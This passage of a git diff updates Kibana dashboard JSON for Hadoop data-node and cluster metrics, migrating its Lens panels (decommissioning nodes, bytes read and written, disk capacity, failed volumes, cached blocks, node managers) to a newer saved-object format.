+ "gridData": { + "h": 7, + "i": "f03b0b45-577e-480e-9fb2-9890b62fc30f", + "w": 12, + "x": 36, + "y": 7 + }, + "panelIndex": "f03b0b45-577e-480e-9fb2-9890b62fc30f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-570e3d96-2c27-4661-8669-77215711bb6e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "4e3e29b3-cd97-447c-b679-0130844d95bb", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "570e3d96-2c27-4661-8669-77215711bb6e": { + "columnOrder": [ + "2c8412e8-db24-4dab-8635-32a74ef1873c" + ], + "columns": { + "2c8412e8-db24-4dab-8635-32a74ef1873c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.namenode.nodes.num_decommissioning_data: *" + }, + "isBucketed": false, + "label": "Decommissioning Data Nodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.namenode.nodes.num_decommissioning_data" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "4e3e29b3-cd97-447c-b679-0130844d95bb", + "key": "hadoop.namenode.nodes.num_decommissioning_data", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.namenode.nodes.num_decommissioning_data" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "2c8412e8-db24-4dab-8635-32a74ef1873c", + "layerId": "570e3d96-2c27-4661-8669-77215711bb6e", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": 
"indexpattern-datasource-layer-570e3d96-2c27-4661-8669-77215711bb6e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "4e3e29b3-cd97-447c-b679-0130844d95bb", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "570e3d96-2c27-4661-8669-77215711bb6e": { - "columnOrder": [ - "2c8412e8-db24-4dab-8635-32a74ef1873c" - ], - "columns": { - "2c8412e8-db24-4dab-8635-32a74ef1873c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.namenode.nodes.num_decommissioning_data: *" - }, - "isBucketed": false, - "label": "Decommissioning Data Nodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.namenode.nodes.num_decommissioning_data" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of data nodes decommissioning [Metrics Hadoop]" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "69af342c-71f3-41fe-a76e-cc9f49baafa3": { + "columnOrder": [ + "797ebde1-9d7b-4950-9554-194d5c702684", + "fc0da319-4b72-4ccc-8e27-2c4ebec508c7", + "4b9fcd50-2227-40e5-a93b-ebb16831630d", + "56fd6e61-acf3-45e6-9904-98f7ffa90644" + ], + "columns": { + "4b9fcd50-2227-40e5-a93b-ebb16831630d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes read", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "4e3e29b3-cd97-447c-b679-0130844d95bb", - "key": 
"hadoop.namenode.nodes.num_decommissioning_data", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.namenode.nodes.num_decommissioning_data" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.datanode.bytes.read" + }, + "56fd6e61-acf3-45e6-9904-98f7ffa90644": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes written", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "visualization": { - "accessor": "2c8412e8-db24-4dab-8635-32a74ef1873c", - "layerId": "570e3d96-2c27-4661-8669-77215711bb6e", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.datanode.bytes.written" + }, + "797ebde1-9d7b-4950-9554-194d5c702684": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "fc0da319-4b72-4ccc-8e27-2c4ebec508c7": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of service.address", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "service.address" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": 
null, + "disabled": false, + "index": "fbe5ed56-727a-408f-ab58-b03abf1502da", + "key": "hadoop.datanode.bytes.read", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.datanode.bytes.read" + } + } }, - "gridData": { - "h": 7, - "i": "f03b0b45-577e-480e-9fb2-9890b62fc30f", - "w": 12, - "x": 36, - "y": 7 + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "37000496-671a-41ab-ab7b-35823e718530", + "key": "hadoop.datanode.bytes.written", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.datanode.bytes.written" + } + } + } + ], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"hadoop.datanode\" " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "f03b0b45-577e-480e-9fb2-9890b62fc30f", - "title": "Number of data nodes decommissioning [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 15, - "i": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f", - "w": 24, - "x": 0, - "y": 12 + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "panelIndex": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f", - "panelRefName": "panel_eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f", - "title": "Number of bytes read and written [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true + "layers": [ + { + "accessors": [ + "4b9fcd50-2227-40e5-a93b-ebb16831630d", + "56fd6e61-acf3-45e6-9904-98f7ffa90644" + ], + "layerId": "69af342c-71f3-41fe-a76e-cc9f49baafa3", + "layerType": "data", + "position": "top", + "seriesType": "line", + 
"showGridlines": false, + "splitAccessor": "fc0da319-4b72-4ccc-8e27-2c4ebec508c7", + "xAccessor": "797ebde1-9d7b-4950-9554-194d5c702684" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" }, - "gridData": { - "h": 6, - "i": "ed24ad58-0d8a-495f-9767-1d994d65d52f", - "w": 24, - "x": 24, - "y": 14 + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "ed24ad58-0d8a-495f-9767-1d994d65d52f", - "panelRefName": "panel_ed24ad58-0d8a-495f-9767-1d994d65d52f", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true + "valueLabels": "hide", + "xTitle": "Timestamp", + "yLeftExtent": { + "mode": "full" }, - "gridData": { - "h": 7, - "i": "21f37466-b62d-4219-bc1a-d787833a8dbf", - "w": 12, - "x": 24, - "y": 20 + "yRightExtent": { + "mode": "full" }, - "panelIndex": "21f37466-b62d-4219-bc1a-d787833a8dbf", - "panelRefName": "panel_21f37466-b62d-4219-bc1a-d787833a8dbf", - "type": "lens", - "version": "8.3.0" + "yTitle": "Bytes" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 7, - "i": "da4e4113-6794-4a85-977c-51879f500a0a", - "w": 12, - "x": 36, - "y": 20 - }, - "panelIndex": "da4e4113-6794-4a85-977c-51879f500a0a", - "panelRefName": "panel_da4e4113-6794-4a85-977c-51879f500a0a", - "type": "lens", - "version": "8.3.0" - } - ], - "timeRestore": false, - "title": "[Metrics Hadoop] Data nodes", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-c06fb680-cf76-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "hadoop-c4e16fe0-cf73-11ec-bc3e-6faca2b11df2", - "name": "1f52942c-5657-4bab-8e38-5cf69692f448:panel_1f52942c-5657-4bab-8e38-5cf69692f448", - "type": "lens" - }, - { - "id": "metrics-*", - "name": 
"eac20ac9-93ca-483c-ab27-d10a06f4dde0:indexpattern-datasource-layer-df057b77-cd5b-4e7a-bb21-ac003f0f4eb8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "eac20ac9-93ca-483c-ab27-d10a06f4dde0:50b51ba8-f87e-405f-8a53-efea43df987b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75574416-a16d-43be-a303-2dc31359a8c9:indexpattern-datasource-layer-3d40213c-fe67-4c30-bde1-5450fbadcd20", - "type": "index-pattern" + "title": "Number of bytes read and written [Hadoop Metrics]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-69af342c-71f3-41fe-a76e-cc9f49baafa3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fbe5ed56-727a-408f-ab58-b03abf1502da", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "37000496-671a-41ab-ab7b-35823e718530", + "type": "index-pattern" + } + ] + } }, - { - "id": "metrics-*", - "name": "75574416-a16d-43be-a303-2dc31359a8c9:0fdf9d17-fb31-40a8-b8db-02850b080c9d", - "type": "index-pattern" + "gridData": { + "h": 15, + "i": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f", + "w": 24, + "x": 0, + "y": 12 }, - { - "id": "hadoop-73f3b470-cf74-11ec-bc3e-6faca2b11df2", - "name": "c8a6b036-ae93-4055-aef7-dd575221f10d:panel_c8a6b036-ae93-4055-aef7-dd575221f10d", - "type": "lens" + "panelIndex": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f", + "title": "Number of bytes read and written [Metrics Hadoop]", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "bfc4ee7d-e67a-492c-a0de-3ba41b193e52": { + "columnOrder": [ + "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62", + "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62X0" + ], + "columns": { + 
"f5aa20c5-3dfb-45e8-82ff-4a24d054ef62": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Disk Capacity", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "formula": "median(hadoop.datanode.disk_space.capacity)", + "isFormulaBroken": false + }, + "references": [ + "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62X0" + ], + "scale": "ratio" + }, + "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Disk Capacity (GB)", + "operationType": "median", + "scale": "ratio", + "sourceField": "hadoop.datanode.disk_space.capacity" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "87fdb03b-29d6-48a3-952a-da13b704e34a", + "key": "hadoop.datanode.disk_space.capacity", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.datanode.disk_space.capacity" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62", + "layerId": "bfc4ee7d-e67a-492c-a0de-3ba41b193e52", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Data node disk capacity [Metrics Hadoop]", + "visualizationType": "lnsLegacyMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-bfc4ee7d-e67a-492c-a0de-3ba41b193e52", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "87fdb03b-29d6-48a3-952a-da13b704e34a", + "type": "index-pattern" + } + ] + } }, - { - "id": "metrics-*", - "name": 
"f03b0b45-577e-480e-9fb2-9890b62fc30f:indexpattern-datasource-layer-570e3d96-2c27-4661-8669-77215711bb6e", - "type": "index-pattern" + "gridData": { + "h": 6, + "i": "ed24ad58-0d8a-495f-9767-1d994d65d52f", + "w": 24, + "x": 24, + "y": 14 }, - { - "id": "metrics-*", - "name": "f03b0b45-577e-480e-9fb2-9890b62fc30f:4e3e29b3-cd97-447c-b679-0130844d95bb", - "type": "index-pattern" + "panelIndex": "ed24ad58-0d8a-495f-9767-1d994d65d52f", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "011f4580-0ed6-43f2-aeb7-64965ecd5e83": { + "columnOrder": [ + "7fd9ea12-b127-443d-a3d9-a07be9982c13" + ], + "columns": { + "7fd9ea12-b127-443d-a3d9-a07be9982c13": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Failed volumes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.datanode.volumes.failed" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "hadoop.datanode.volumes.failed : * " + }, + "visualization": { + "accessor": "7fd9ea12-b127-443d-a3d9-a07be9982c13", + "layerId": "011f4580-0ed6-43f2-aeb7-64965ecd5e83", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Failed Volumes [Metrics Hadoop]", + "visualizationType": "lnsLegacyMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-011f4580-0ed6-43f2-aeb7-64965ecd5e83", + "type": "index-pattern" + } + ] + } }, - { - "id": "hadoop-09305b10-cf75-11ec-bc3e-6faca2b11df2", - "name": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f:panel_eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f", - 
"type": "lens" + "gridData": { + "h": 7, + "i": "21f37466-b62d-4219-bc1a-d787833a8dbf", + "w": 12, + "x": 24, + "y": 20 }, - { - "id": "hadoop-2132d820-cd2f-11ec-be30-1d9331f0b107", - "name": "ed24ad58-0d8a-495f-9767-1d994d65d52f:panel_ed24ad58-0d8a-495f-9767-1d994d65d52f", - "type": "lens" + "panelIndex": "21f37466-b62d-4219-bc1a-d787833a8dbf", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "781bec53-7762-43ba-bc46-4a54c6b985ae": { + "columnOrder": [ + "931e5379-b427-4096-8030-51a9ad546b02" + ], + "columns": { + "931e5379-b427-4096-8030-51a9ad546b02": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Cached blocks", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.datanode.blocks.cached" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "hadoop.datanode.blocks.cached : * " + }, + "visualization": { + "accessor": "931e5379-b427-4096-8030-51a9ad546b02", + "layerId": "781bec53-7762-43ba-bc46-4a54c6b985ae", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Cached blocks [Metrics Hadoop]", + "visualizationType": "lnsLegacyMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-781bec53-7762-43ba-bc46-4a54c6b985ae", + "type": "index-pattern" + } + ] + } }, - { - "id": "hadoop-ace7b680-cf76-11ec-bc3e-6faca2b11df2", - "name": "21f37466-b62d-4219-bc1a-d787833a8dbf:panel_21f37466-b62d-4219-bc1a-d787833a8dbf", - "type": "lens" + "gridData": { + "h": 7, + "i": 
"da4e4113-6794-4a85-977c-51879f500a0a", + "w": 12, + "x": 36, + "y": 20 }, - { - "id": "hadoop-a6a8b400-cf75-11ec-bc3e-6faca2b11df2", - "name": "da4e4113-6794-4a85-977c-51879f500a0a:panel_da4e4113-6794-4a85-977c-51879f500a0a", - "type": "lens" - } + "panelIndex": "da4e4113-6794-4a85-977c-51879f500a0a", + "type": "lens", + "version": "8.6.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Hadoop] Data nodes", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "eac20ac9-93ca-483c-ab27-d10a06f4dde0:indexpattern-datasource-layer-df057b77-cd5b-4e7a-bb21-ac003f0f4eb8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "eac20ac9-93ca-483c-ab27-d10a06f4dde0:50b51ba8-f87e-405f-8a53-efea43df987b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75574416-a16d-43be-a303-2dc31359a8c9:indexpattern-datasource-layer-3d40213c-fe67-4c30-bde1-5450fbadcd20", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75574416-a16d-43be-a303-2dc31359a8c9:0fdf9d17-fb31-40a8-b8db-02850b080c9d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f03b0b45-577e-480e-9fb2-9890b62fc30f:indexpattern-datasource-layer-570e3d96-2c27-4661-8669-77215711bb6e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f03b0b45-577e-480e-9fb2-9890b62fc30f:4e3e29b3-cd97-447c-b679-0130844d95bb", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "1f52942c-5657-4bab-8e38-5cf69692f448:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "1f52942c-5657-4bab-8e38-5cf69692f448:indexpattern-datasource-layer-ee57a119-2827-4586-82f1-c796c86d76d9", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "c8a6b036-ae93-4055-aef7-dd575221f10d:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": 
"c8a6b036-ae93-4055-aef7-dd575221f10d:indexpattern-datasource-layer-efa00ae4-03e1-45c9-aaa9-47610de989d9", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f:indexpattern-datasource-layer-69af342c-71f3-41fe-a76e-cc9f49baafa3", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f:fbe5ed56-727a-408f-ab58-b03abf1502da", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f:37000496-671a-41ab-ab7b-35823e718530", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "ed24ad58-0d8a-495f-9767-1d994d65d52f:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "ed24ad58-0d8a-495f-9767-1d994d65d52f:indexpattern-datasource-layer-bfc4ee7d-e67a-492c-a0de-3ba41b193e52", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "ed24ad58-0d8a-495f-9767-1d994d65d52f:87fdb03b-29d6-48a3-952a-da13b704e34a", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "21f37466-b62d-4219-bc1a-d787833a8dbf:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "21f37466-b62d-4219-bc1a-d787833a8dbf:indexpattern-datasource-layer-011f4580-0ed6-43f2-aeb7-64965ecd5e83", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "da4e4113-6794-4a85-977c-51879f500a0a:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "da4e4113-6794-4a85-977c-51879f500a0a:indexpattern-datasource-layer-781bec53-7762-43ba-bc46-4a54c6b985ae", + "id": "metrics-*" + } + ], + "managed": false } \ No newline at end of file 
diff --git a/packages/hadoop/kibana/dashboard/hadoop-cb235590-cd24-11ec-be30-1d9331f0b107.json b/packages/hadoop/kibana/dashboard/hadoop-cb235590-cd24-11ec-be30-1d9331f0b107.json
index e4837902fbb..846835b3541 100644
--- a/packages/hadoop/kibana/dashboard/hadoop-cb235590-cd24-11ec-be30-1d9331f0b107.json
+++ b/packages/hadoop/kibana/dashboard/hadoop-cb235590-cd24-11ec-be30-1d9331f0b107.json
@@ -1,1279 +1,1295 @@ { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "id": "hadoop-cb235590-cd24-11ec-be30-1d9331f0b107", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:16:59.199Z", + "created_at": "2023-11-07T17:16:59.199Z", + "version": "WzEwMiwxXQ==", + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 18, + "i": "08fde296-94c6-4dbd-bd1f-77c67e0125e6", + "w": 24, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-35726819-8a70-4f5e-b150-1626c191f380", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "4b01387d-bd18-4e16-b860-005e4a71e957", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d846e0a6-42a9-4840-82e4-f217959a63fb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c50d822a-587a-4198-90c1-847fe7355fa1", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e78473e3-a006-46cf-bada-e75ab9c4b279", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "35726819-8a70-4f5e-b150-1626c191f380": { - "columnOrder": [ - "c4649608-0cba-486f-8aec-460655407f67", - "39e015f6-e8f8-4a9a-80e3-2570606d310c", - 
"09a20c96-905b-40c8-9c40-77bfb5edb5b7", - "3708838a-0567-4295-8e77-3a39aca246cd", - "02f59eb1-8c13-41d6-a537-58fb1f051f84" - ], - "columns": { - "02f59eb1-8c13-41d6-a537-58fb1f051f84": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.node_managers.num_lost: *" - }, - "isBucketed": false, - "label": "Lost", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.node_managers.num_lost" - }, - "09a20c96-905b-40c8-9c40-77bfb5edb5b7": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.node_managers.num_unhealthy: *" - }, - "isBucketed": false, - "label": "Unhealthy", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.node_managers.num_unhealthy" - }, - "3708838a-0567-4295-8e77-3a39aca246cd": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.node_managers.num_decommissioned: *" - }, - "isBucketed": false, - "label": "Decommissioned", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.node_managers.num_decommissioned" - }, - "39e015f6-e8f8-4a9a-80e3-2570606d310c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.node_managers.num_active: *" - }, - "isBucketed": false, - "label": "Active", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.node_managers.num_active" - }, - "c4649608-0cba-486f-8aec-460655407f67": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": 
"Timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "4b01387d-bd18-4e16-b860-005e4a71e957", - "key": "hadoop.cluster.node_managers.num_active", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.node_managers.num_active" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "d846e0a6-42a9-4840-82e4-f217959a63fb", - "key": "hadoop.cluster.node_managers.num_unhealthy", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.node_managers.num_unhealthy" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "c50d822a-587a-4198-90c1-847fe7355fa1", - "key": "hadoop.cluster.node_managers.num_decommissioned", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.node_managers.num_decommissioned" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "e78473e3-a006-46cf-bada-e75ab9c4b279", - "key": "hadoop.cluster.node_managers.num_lost", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.node_managers.num_lost" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - 
"labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "39e015f6-e8f8-4a9a-80e3-2570606d310c", - "09a20c96-905b-40c8-9c40-77bfb5edb5b7", - "3708838a-0567-4295-8e77-3a39aca246cd", - "02f59eb1-8c13-41d6-a537-58fb1f051f84" - ], - "layerId": "35726819-8a70-4f5e-b150-1626c191f380", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "xAccessor": "c4649608-0cba-486f-8aec-460655407f67", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "39e015f6-e8f8-4a9a-80e3-2570606d310c" - }, - { - "axisMode": "left", - "forAccessor": "09a20c96-905b-40c8-9c40-77bfb5edb5b7" - }, - { - "axisMode": "left", - "forAccessor": "3708838a-0567-4295-8e77-3a39aca246cd" - }, - { - "axisMode": "left", - "forAccessor": "02f59eb1-8c13-41d6-a537-58fb1f051f84" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "Timestamp", - "yTitle": "Node Managers" - } + 